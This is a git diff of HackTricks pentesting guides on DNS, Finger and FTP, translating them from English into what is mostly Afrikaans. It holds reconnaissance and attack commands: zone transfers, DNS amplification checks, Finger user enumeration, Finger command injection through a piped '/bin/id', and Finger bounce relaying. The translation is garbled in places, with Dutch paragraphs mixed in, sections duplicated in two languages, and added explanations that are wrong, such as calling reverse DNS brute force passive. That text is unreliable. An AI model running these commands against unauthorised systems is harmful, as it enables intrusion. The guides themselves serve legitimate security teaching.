omgekeerde DNS-zoekopdracht wordt een IP-adres omgezet in een domeinnaam. Dit kan handig zijn bij het identificeren van subdomeinen die mogelijk niet openbaar zijn. + +Omgekeerde BF kan worden uitgevoerd met behulp van verschillende tools, zoals `dnsrecon`, `dnsenum` en `fierce`. Deze tools kunnen worden gebruikt om een lijst met subdomeinen te genereren op basis van een gegeven IP-adres. + +Het is belangrijk op te merken dat omgekeerde BF een passieve techniek is en geen actieve aanvallen uitvoert op de DNS-server. Het is een nuttige methode om informatie te verzamelen tijdens het pentesten, maar het moet met de nodige voorzichtigheid worden gebruikt om geen ongewenste aandacht te trekken. ```bash dnsrecon -r 127.0.0.0/24 -n #DNS reverse of all of the addresses dnsrecon -r 127.0.1.0/24 -n #DNS reverse of all of the addresses dnsrecon -r /24 -n #DNS reverse of all of the addresses dnsrecon -d active.htb -a -n #Zone transfer ``` - {% hint style="info" %} -If you are able to find subdomains resolving to internal IP-addresses, you should try to perform a reverse dns BF to the NSs of the domain asking for that IP range. +As jy subdomeine vind wat na interne IP-adresse verwys, moet jy probeer om 'n omgekeerde DNS BF uit te voer na die NSs van die domein en vra vir daardie IP-reeks. {% endhint %} -Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) +'n Ander hulpmiddel om dit te doen: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) -You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (this tool is also helpful with BGP). - -### DNS - Subdomains BF +Jy kan omgekeerde IP-reeks navrae doen na [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (hierdie hulpmiddel is ook nuttig met BGP). +### DNS - Subdomeine BF ```bash dnsenum --dnsserver --enum -p 0 -s 0 -o subdomains.txt -f subdomains-1000.txt dnsrecon -D subdomains-1000.txt -d -n dnscan -d -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan ``` +### Aktiewe Direktory-bedieners -### Active Directory servers +Active Directory (AD) is 'n diens wat deur Microsoft Windows aangebied word en dit stel organisasies in staat om gebruikers, rekenaars en hulpbronne binne 'n netwerk te bestuur. As 'n pentester is dit belangrik om 'n goeie begrip van AD-servers te hê, aangesien dit dikwels 'n teiken is vir aanvalle. +Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by AD-servers: + +- **Domain Controllers (DCs)**: Dit is die kern van 'n AD-omgewing en bevat die gebruikersrekenaars, groepe en beleide. Dit is die primêre doelwit vir aanvallers, aangesien dit toegang tot die hele AD-omgewing kan gee. +- **Global Catalog (GC)**: Die GC is 'n spesiale tipe DC wat 'n gedeeltelike replikasie van alle objekte in die AD-omgewing bevat. Dit maak dit makliker om soekvrae uit te voer en gebruikersinligting te vind. +- **LDAP**: Die Lightweight Directory Access Protocol (LDAP) is die protokol wat gebruik word om te kommunikeer met AD-servers. Dit maak dit moontlik om te soek, te lees en te skryf na die AD-databasis. +- **Kerberos**: Dit is die standaard-verifikasieprotokol wat deur AD gebruik word. Dit is belangrik om te verstaan hoe Kerberos werk en hoe dit gebruik kan word om toegang te verkry tot AD-bronne. +- **DNS**: Die Domain Name System (DNS) is noodsaaklik vir die funksionering van AD. Dit vertaal domeinname na IP-adresse en maak dit moontlik vir rekenaars om met mekaar te kommunikeer. +- **Group Policy Objects (GPOs)**: GPO's is beleidsinstellings wat op AD-objekte toegepas kan word. Dit kan gebruik word om sekuriteitsbeleide af te dwing en toegang tot hulpbronne te beperk. + +Deur 'n goeie begrip van AD-servers te hê, kan 'n pentester die omgewing beter assesseer en moontlike aanvals ```bash dig -t _gc._tcp.lab.domain.com dig -t _ldap._tcp.lab.domain.com @@ -165,61 +291,72 @@ nslookup -type=srv _kerberos._tcp.domain.com nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='domain.com'" ``` - ### DNSSec -```bash - #Query paypal subdomains to ns3.isc-sns.info - nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal.com ns3.isc-sns.info -``` +DNSSec (Domain Name System Security Extensions) is 'n sekuriteitsuitbreiding vir die Domain Name System (DNS) wat ontwerp is om die integriteit en veiligheid van DNS-inligting te verbeter. Dit voeg 'n laag van sekuriteit by die DNS-protokol deur die ondertekening van DNS-rekords met digitale handtekeninge. Hierdie handtekeninge kan dan geverifieer word deur DNS-kliënte om te verseker dat die ontvangste DNS-inligting nie gewysig of vervals is nie. +DNSSec beskerm teen aanvalle soos DNS-spoofing, waar 'n aanvaller valse DNS-inligting versprei om gebruikers na 'n kwaadwillige webwerf te stuur. Dit beskerm ook teen DNS-cache-vergiftiging, waar 'n aanvaller valse DNS-inligting in 'n DNS-kas plaas om gebruikers na 'n kwaadwillige webwerf te stuur. + +Om DNSSec te implementeer, moet 'n domeinnaameienaar DNS-rekords onderteken met 'n privaat sleutel en die ooreenstemmende openbare sleutel publiseer in die DNS. Wanneer 'n DNS-kliënt 'n DNS-rekord ontvang, kan dit die handtekening verifieer deur die ooreenstemmende openbare sleutel te gebruik. As die handtekening geldig is, kan die DNS-kliënt verseker dat die ontvangste DNS-inligting nie gewysig is nie. + +DNSSec is 'n belangrike tegniek vir die verbetering van die veiligheid van die DNS en die beskerming teen aanvalle op DNS-inligting. Dit word aanbeveel dat domeinnaameienaars DNSSec implementeer om die integriteit en veiligheid van hul DNS-inligting te verseker. +```bash +#Query paypal subdomains to ns3.isc-sns.info +nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal.com ns3.isc-sns.info +``` ### IPv6 -Brute force using "AAAA" requests to gather IPv6 of the subdomains. - +Brute force deur gebruik te maak van "AAAA" versoeke om die IPv6-adresse van die subdomeine te versamel. ```bash dnsdict6 -s -t ``` +# Bruteforce omgekeerde DNS in gebruik van IPv6-adresse -Bruteforce reverse DNS in using IPv6 addresses +Omgekeerde DNS, ook bekend as omgekeerde DNS-opsoek, is 'n proses waardeur 'n IP-adres vertaal word na 'n domeinnaam. Dit kan nuttig wees tydens pentesting, omdat dit kan help om inligting oor die doelwit se infrastruktuur te bekom. +Om omgekeerde DNS vir IPv6-adresse te bruteforce, kan jy die volgende stappe volg: + +1. Identifiseer die IPv6-adres wat jy wil ondersoek. +2. Gebruik 'n gereedskap soos `dnsrecon` of `dnsenum` om 'n lys moontlike domeinname te genereer wat gekoppel kan wees aan die IPv6-adres. +3. Voer 'n bruteforce-aanval uit deur die gereedskap te gebruik om elke moontlike domeinnaam te ondersoek en te kyk of dit gekoppel is aan die IPv6-adres. +4. Analiseer die resultate en identifiseer enige relevante domeinname wat gekoppel is aan die IPv6-adres. + +Dit is belangrik om te onthou dat omgekeerde DNS-bruteforce 'n tydrowende proses kan wees, veral vir IPv6-adresse wat 'n groot aantal moontlike domeinname kan hê. Dit kan ook 'n hoë volume van navrae na die DNS-infrastruktuur veroorsaak, wat 'n potensiële rooi vlag vir die doelwit se beveiliging kan wees. + +Dit is dus raadsaam om hierdie tegniek met omsigtigheid en in ooreenstemming met die toepaslike wetlike en etiese riglyne te gebruik. ```bash dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns.ripe.net ``` +### DNS Rekursie DDoS -### DNS Recursion DDoS - -If **DNS recursion is enabled**, an attacker could **spoof** the **origin** on the UDP packet in order to make the **DNS send the response to the victim server**. An attacker could abuse **ANY** or **DNSSEC** record types as they use to have the bigger responses.\ -The way to **check** if a DNS supports **recursion** is to query a domain name and **check** if the **flag "ra"** (_recursion available_) is in the response: - +Indien **DNS rekursie geaktiveer** is, kan 'n aanvaller die **oorsprong** op die UDP-pakket vervals om die **DNS om die respons na die slagofferserver te stuur**. 'n Aanvaller kan **ENIGE** of **DNSSEC** rekordtipes misbruik, aangesien hulle geneig is om die grootste respons te hê.\ +Die manier om te **verifieer** of 'n DNS **rekursie** ondersteun, is om 'n domeinnaam te ondervra en te **kyk** of die vlag "ra" (_rekursie beskikbaar_) in die respons is: ```bash dig google.com A @ ``` - -**Non available**: +**Nie beskikbaar**: ![](<../.gitbook/assets/image (275).png>) -**Available**: +**Beskikbaar**: ![](<../.gitbook/assets/image (276).png>)
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -### Mail to nonexistent account +### E-pos na 'n nie-bestaande rekening -Through the examination of a nondelivery notification (NDN) triggered by an email sent to an invalid address within a target domain, valuable internal network details are often disclosed. +Deur die ondersoek van 'n nie-lewering-kennisgewing (NDN) wat geaktiveer word deur 'n e-pos wat gestuur is na 'n ongeldige adres binne 'n teikendomein, word waardevolle interne netwerkdetails dikwels bekendgemaak. -The provided nondelivery report includes information such as: - -- The generating server was identified as `server.example.com`. -- A failure notice for `user@example.com` with the error code `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` was returned. -- Internal IP addresses and hostnames were disclosed in the original message headers. +Die verskafte nie-lewering-verslag bevat inligting soos: +- Die genererende bediener is geïdentifiseer as `server.example.com`. +- 'n Foutkennisgewing vir `user@example.com` met die foutkode `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` is teruggekeer. +- Interne IP-adresse en gasheernaam is bekendgemaak in die oorspronklike boodskaphoofstukke. ```markdown The original message headers were modified for anonymity and now present randomized data: @@ -243,9 +380,23 @@ filter.example.com with ESMTP id xVNPkwaqGgdyH5Ag for user@example.com; Mon, X-Envelope-From: sender@anotherdomain.org X-Apparent-Source-IP: 198.51.100.37 ``` +## Konfigurasie lêers -## Config files +Config files, or configuration files, are files that contain settings and parameters for various software applications. These files are used to customize the behavior of the software and can be found in different locations depending on the operating system and the specific application. +Konfigurasie lêers, of konfigurasie lêers, is lêers wat instellings en parameters vir verskeie sagtewaretoepassings bevat. Hierdie lêers word gebruik om die gedrag van die sagteware aan te pas en kan in verskillende plekke gevind word, afhangende van die bedryfstelsel en die spesifieke toepassing. + +Config files are commonly used in the context of network services, including DNS (Domain Name System). In the case of DNS, the config file is typically located in the `/etc` directory and is named `named.conf` or `named.conf.options`. + +Konfigurasie lêers word algemeen gebruik in die konteks van netwerkdienste, insluitend DNS (Domain Name System). In die geval van DNS is die konfigurasie lêer tipies geleë in die `/etc` gids en word dit genoem `named.conf` of `named.conf.options`. + +These config files contain important information such as the IP addresses of DNS servers, domain zone configurations, and access control rules. By analyzing and manipulating these config files, a hacker can potentially gain unauthorized access, redirect DNS queries, or perform other malicious activities. + +Hierdie konfigurasie lêers bevat belangrike inligting soos die IP-adresse van DNS-bedieners, domein-sone-konfigurasies en toegangsbeheer-reëls. Deur hierdie konfigurasie lêers te analiseer en te manipuleer, kan 'n hacker moontlik ongemagtigde toegang verkry, DNS-navrae omlei of ander skadelike aktiwiteite uitvoer. + +It is important for pentesters and system administrators to review and secure these config files to prevent potential vulnerabilities and unauthorized access. + +Dit is belangrik vir pentesters en stelseladministrateurs om hierdie konfigurasie lêers te hersien en te beveilig om potensiële kwesbaarhede en ongemagtigde toegang te voorkom. ``` host.conf /etc/resolv.conf @@ -255,91 +406,88 @@ host.conf /etc/bind/named.conf.log /etc/bind/* ``` +Gevaarlike instellings wanneer 'n Bind-bediener gekonfigureer word: -Dangerous settings when configuring a Bind server: - -| **Option** | **Description** | +| **Opsie** | **Beskrywing** | | ----------------- | ------------------------------------------------------------------------------ | -| `allow-query` | Defines which hosts are allowed to send requests to the DNS server. | -| `allow-recursion` | Defines which hosts are allowed to send recursive requests to the DNS server. | -| `allow-transfer` | Defines which hosts are allowed to receive zone transfers from the DNS server. | -| `zone-statistics` | Collects statistical data of zones. | +| `allow-query` | Definieer watter gasheerse is toegelaat om navrae na die DNS-bediener te stuur. | +| `allow-recursion` | Definieer watter gasheerse is toegelaat om herhalende navrae na die DNS-bediener te stuur. | +| `allow-transfer` | Definieer watter gasheerse is toegelaat om sone-oordragte van die DNS-bediener te ontvang. | +| `zone-statistics` | Versamel statistiese data van sones. | -## References +## Verwysings * [https://www.myrasecurity.com/en/knowledge-hub/dns/](https://www.myrasecurity.com/en/knowledge-hub/dns/) -* Book: **Network Security Assessment 3rd edition** - -## HackTricks Automatic Commands +* Boek: **Network Security Assessment 3rd edition** +## HackTricks Outomatiese Opdragte ``` Protocol_Name: DNS #Protocol Abbreviation if there is one. Port_Number: 53 #Comma separated if there is more than one. Protocol_Description: Domain Name Service #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for DNS - Note: | - #These are the commands I run every time I see an open DNS port +Name: Notes +Description: Notes for DNS +Note: | +#These are the commands I run every time I see an open DNS port - dnsrecon -r 127.0.0.0/24 -n {IP} -d {Domain_Name} - dnsrecon -r 127.0.1.0/24 -n {IP} -d {Domain_Name} - dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name} - dig axfr @{IP} - dig axfr {Domain_Name} @{IP} - nslookup - SERVER {IP} - 127.0.0.1 - {IP} - Domain_Name - exit +dnsrecon -r 127.0.0.0/24 -n {IP} -d {Domain_Name} +dnsrecon -r 127.0.1.0/24 -n {IP} -d {Domain_Name} +dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name} +dig axfr @{IP} +dig axfr {Domain_Name} @{IP} +nslookup +SERVER {IP} +127.0.0.1 +{IP} +Domain_Name +exit - https://book.hacktricks.xyz/pentesting/pentesting-dns +https://book.hacktricks.xyz/pentesting/pentesting-dns Entry_2: - Name: Banner Grab - Description: Grab DNS Banner - Command: dig version.bind CHAOS TXT @DNS +Name: Banner Grab +Description: Grab DNS Banner +Command: dig version.bind CHAOS TXT @DNS Entry_3: - Name: Nmap Vuln Scan - Description: Scan for Vulnerabilities with Nmap - Command: nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" {IP} +Name: Nmap Vuln Scan +Description: Scan for Vulnerabilities with Nmap +Command: nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" {IP} Entry_4: - Name: Zone Transfer - Description: Three attempts at forcing a zone transfer - Command: dig axfr @{IP} && dix axfr @{IP} {Domain_Name} && fierce --dns-servers {IP} --domain {Domain_Name} +Name: Zone Transfer +Description: Three attempts at forcing a zone transfer +Command: dig axfr @{IP} && dix axfr @{IP} {Domain_Name} && fierce --dns-servers {IP} --domain {Domain_Name} Entry_5: - Name: Active Directory - Description: Eunuerate a DC via DNS - Command: dig -t _gc._{Domain_Name} && dig -t _ldap._{Domain_Name} && dig -t _kerberos._{Domain_Name} && dig -t _kpasswd._{Domain_Name} && nmap --script dns-srv-enum --script-args "dns-srv-enum.domain={Domain_Name}" - -Entry_6: - Name: consolesless mfs enumeration - Description: DNS enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' -``` +Name: Active Directory +Description: Eunuerate a DC via DNS +Command: dig -t _gc._{Domain_Name} && dig -t _ldap._{Domain_Name} && dig -t _kerberos._{Domain_Name} && dig -t _kpasswd._{Domain_Name} && nmap --script dns-srv-enum --script-args "dns-srv-enum.domain={Domain_Name}" +Entry_6: +Name: consolesless mfs enumeration +Description: DNS enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' +```
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/pentesting-finger.md b/network-services-pentesting/pentesting-finger.md index 5507dab46..ef202e479 100644 --- a/network-services-pentesting/pentesting-finger.md +++ b/network-services-pentesting/pentesting-finger.md @@ -2,92 +2,86 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Info** +## **Basiese Inligting** -The **Finger** program/service is utilized for retrieving details about computer users. Typically, the information provided includes the **user's login name, full name**, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user's plan and project files. - -**Default port:** 79 +Die **Finger** program/diens word gebruik om inligting oor rekenaargebruikers te bekom. Tipies sluit die verskafte inligting die **gebruikers se aanmeldingsnaam, volle naam** en, in sommige gevalle, addisionele besonderhede in. Hierdie addisionele besonderhede kan die kantoorlokasie en telefoonnommer (indien beskikbaar), die tyd waarop die gebruiker aangemeld het, die tydperk van onaktiwiteit (idle time), die laaste keer wat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan- en projeklêers insluit. +**Verstekpoort:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` +## **Opname** -## **Enumeration** - -### **Banner Grabbing/Basic connection** - +### **Banner Grabbing/ Basiese verbinding** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` +### **Gebruikersopsporing** -### **User enumeration** +User enumeration, ook wel bekend als fingerdienst, is een techniek die wordt gebruikt om informatie te verzamelen over gebruikers op een doelsysteem. Het maakt gebruik van de Finger-protocoldienst om informatie zoals gebruikersnamen, volledige namen, e-mailadressen en andere details te verkrijgen. +De Finger-protocoldienst is standaard geïnstalleerd op veel Unix-gebaseerde systemen. Het stelt gebruikers in staat om informatie over andere gebruikers op te vragen door simpelweg hun gebruikersnaam in te voeren. Deze informatie kan nuttig zijn voor een aanvaller, omdat het hen kan helpen bij het identificeren van mogelijke doelwitten en het vergroten van hun kennis over het doelsysteem. + +Om gebruikersopsporing uit te voeren, kan een aanvaller verschillende tools en technieken gebruiken, zoals het gebruik van de `finger`-opdracht op de opdrachtregel, het gebruik van geautomatiseerde scripts of het gebruik van specifieke tools zoals `enum4linux` voor Windows-systemen. + +Het is belangrijk op te merken dat gebruikersopsporing een potentieel risico vormt voor de privacy en beveiliging van gebruikers. Daarom is het belangrijk voor systeembeheerders om de Finger-protocoldienst uit te schakelen of te beperken om ongeautoriseerde toegang tot gebruikersinformatie te voorkomen. ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` - -Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples: - +Alternatiewelik kan jy **finger-user-enum** van [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) gebruik, hier is 'n paar voorbeelde: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` +#### **Nmap voer 'n skrip uit om standaard skripte te gebruik** -#### **Nmap execute a script for doing using default scripts** - -### Metasploit uses more tricks than Nmap - +### Metasploit gebruik meer truuks as Nmap ``` use auxiliary/scanner/finger/finger_users ``` - ### Shodan -* `port:79 USER` - -## Command execution +* `port:79 GEBRUIKER` +## Opdrag uitvoering ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` +## Vinger Stuiter -## Finger Bounce - -[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/) - +[Gebruik 'n stelsel as 'n vinger relais](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/network-services-pentesting/pentesting-ftp/README.md b/network-services-pentesting/pentesting-ftp/README.md index 9854a3549..91950e6a2 100644 --- a/network-services-pentesting/pentesting-ftp/README.md +++ b/network-services-pentesting/pentesting-ftp/README.md @@ -2,123 +2,121 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -## Basic Information +## Basiese Inligting -The **File Transfer Protocol (FTP)** serves as a standard protocol for file transfer across a computer network between a server and a client.\ -It is a **plain-text** protocol that uses as **new line character `0x0d 0x0a`** so sometimes you need to **connect using `telnet`** or **`nc -C`**. - -**Default Port:** 21 +Die **File Transfer Protocol (FTP)** dien as 'n standaardprotokol vir die oordrag van lêers oor 'n rekenaarstelsel tussen 'n bediener en 'n kliënt.\ +Dit is 'n **plain-text**-protokol wat gebruik maak van die **new line character `0x0d 0x0a`**, so soms moet jy **verbind met behulp van `telnet`** of **`nc -C`**. +**Verstekpoort:** 21 ``` PORT STATE SERVICE 21/tcp open ftp ``` +### Verbindings Aktief & Passief -### Connections Active & Passive +In **Aktiewe FTP** inisieer die FTP **kliënt** eers die beheer **verbindings** vanaf sy poort N na die FTP-bediener se bevelspoort - poort 21. Die **kliënt** luister dan na poort **N+1** en stuur die poort N+1 na die FTP-bediener. Die FTP **Bediener** inisieer dan die data **verbindings**, vanaf **sy poort M na die poort N+1** van die FTP-kliënt. -In **Active FTP** the FTP **client** first **initiates** the control **connection** from its port N to FTP Servers command port – port 21. The **client** then **listens** to port **N+1** and sends the 